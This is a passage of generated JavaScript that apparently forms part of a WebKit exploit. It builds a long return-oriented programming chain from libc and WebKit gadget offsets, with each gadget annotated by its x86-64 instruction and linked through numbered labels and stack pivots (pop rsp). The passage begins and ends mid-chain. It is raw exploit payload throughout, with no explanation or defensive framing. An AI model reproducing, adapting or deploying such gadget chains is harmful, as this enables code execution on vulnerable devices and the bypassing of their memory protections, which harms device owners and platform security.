webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+399936, //L8370
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L8370:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8372:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+400128, //L8375
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+400144, //L8376
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+400096, //L8373
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+400112, //L8374
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L8373:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L8374:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8375:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8376:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+400224, //L8377
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+400240, //L8378
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L8377:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8378:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+400336, //L8380
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+400320, //L8379
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L8379:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8380:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+400416, //L8381
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L8381:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8382:
db([88, 0]); // 0x58
set_gadget(libc_base+144605,); //pop rdi
//L8383:
db([88, 0]); // 0x58
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+400560, //L8384
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+400592, //L8386
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+400576, //L8385
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L8384:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8385:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8386:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+400760, //L8388
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+400776, //L8389
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+400744, //L8387
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L8387:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8388:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8389:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+400888, //L8391
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+400936, //L8394
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+400904, //L8392
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L8391:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8392:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L8393:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8394:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+401048, //L8395+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+401040, //L8395
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L8395:
db([0, 0]); // 0x0
set_gadgets([
ropchain+401064, //L8395+24
ropchain+401080, //L8390
libc_base+782311, //pop rsp
ropchain+408824, //L8396
//L8390:
libc_base+764760, //pop rsi
ropchain+401120, //L8397
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L8397:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L8399:
db([4294967196, 4294967295]); // -0x64
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+401240, //L8402
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+401224, //L8400
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L8400:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8402:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+401416, //L8405
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+401432, //L8406
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+401384, //L8403
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+401400, //L8404
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L8403:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L8404:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8405:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8406:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+401512, //L8407
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+401528, //L8408
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L8407:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8408:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+401624, //L8410
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+401608, //L8409
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L8409:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8410:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+401704, //L8411
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L8411:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8412:
db([111, 0]); // 0x6f
set_gadget(libc_base+144605,); //pop rdi
//L8413:
db([111, 0]); // 0x6f
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+401848, //L8414
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+401880, //L8416
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+401864, //L8415
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L8414:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8415:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8416:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+402048, //L8418
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+402064, //L8419
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+402032, //L8417
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L8417:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8418:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8419:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+402176, //L8421
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+402224, //L8424
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+402192, //L8422
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L8421:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8422:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L8423:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8424:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+402336, //L8425+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+402328, //L8425
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L8425:
db([0, 0]); // 0x0
set_gadgets([
ropchain+402352, //L8425+24
ropchain+402368, //L8420
libc_base+782311, //pop rsp
ropchain+408824, //L8426
//L8420:
libc_base+764760, //pop rsi
ropchain+402408, //L8427
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L8427:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L8429:
db([4294967196, 4294967295]); // -0x64
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+402528, //L8432
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+402512, //L8430
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L8430:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8432:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+402704, //L8435
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+402720, //L8436
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+402672, //L8433
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+402688, //L8434
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L8433:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L8434:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8435:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8436:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+402800, //L8437
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+402816, //L8438
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L8437:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8438:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+402912, //L8440
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+402896, //L8439
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L8439:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8440:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+402992, //L8441
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L8441:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8442:
db([98, 0]); // 0x62
set_gadget(libc_base+144605,); //pop rdi
//L8443:
db([98, 0]); // 0x62
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+403136, //L8444
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+403168, //L8446
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+403152, //L8445
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L8444:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8445:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8446:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+403336, //L8448
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+403352, //L8449
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+403320, //L8447
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L8447:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8448:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8449:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+403464, //L8451
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+403512, //L8454
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+403480, //L8452
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L8451:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8452:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L8453:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8454:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+403624, //L8455+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+403616, //L8455
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L8455:
db([0, 0]); // 0x0
set_gadgets([
ropchain+403640, //L8455+24
ropchain+403656, //L8450
libc_base+782311, //pop rsp
ropchain+408824, //L8456
//L8450:
libc_base+764760, //pop rsi
ropchain+403696, //L8457
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L8457:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L8459:
db([4294967196, 4294967295]); // -0x64
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+403816, //L8462
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+403800, //L8460
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L8460:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8462:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+403992, //L8465
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+404008, //L8466
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+403960, //L8463
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+403976, //L8464
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L8463:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L8464:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8465:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8466:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+404088, //L8467
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+404104, //L8468
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L8467:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8468:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+404200, //L8470
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+404184, //L8469
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L8469:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8470:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+404280, //L8471
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L8471:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8472:
db([99, 0]); // 0x63
set_gadget(libc_base+144605,); //pop rdi
//L8473:
db([99, 0]); // 0x63
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+404424, //L8474
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+404456, //L8476
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+404440, //L8475
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L8474:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8475:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8476:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+404624, //L8478
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+404640, //L8479
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+404608, //L8477
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L8477:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8478:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8479:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+404752, //L8481
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+404800, //L8484
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+404768, //L8482
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L8481:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8482:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L8483:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8484:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+404912, //L8485+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+404904, //L8485
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L8485:
db([0, 0]); // 0x0
set_gadgets([
ropchain+404928, //L8485+24
ropchain+404944, //L8480
libc_base+782311, //pop rsp
ropchain+488736, //L8486
//L8480:
libc_base+764760, //pop rsi
ropchain+404984, //L8487
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L8487:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L8489:
db([4294967196, 4294967295]); // -0x64
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+405104, //L8492
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+405088, //L8490
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L8490:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8492:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+405280, //L8495
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+405296, //L8496
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+405248, //L8493
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+405264, //L8494
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L8493:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L8494:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8495:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8496:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+405376, //L8497
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+405392, //L8498
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L8497:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8498:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+405488, //L8500
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+405472, //L8499
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L8499:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8500:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+405568, //L8501
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L8501:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8502:
db([115, 0]); // 0x73
set_gadget(libc_base+144605,); //pop rdi
//L8503:
db([115, 0]); // 0x73
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+405712, //L8504
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+405744, //L8506
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+405728, //L8505
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L8504:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8505:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8506:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+405912, //L8508
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+405928, //L8509
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+405896, //L8507
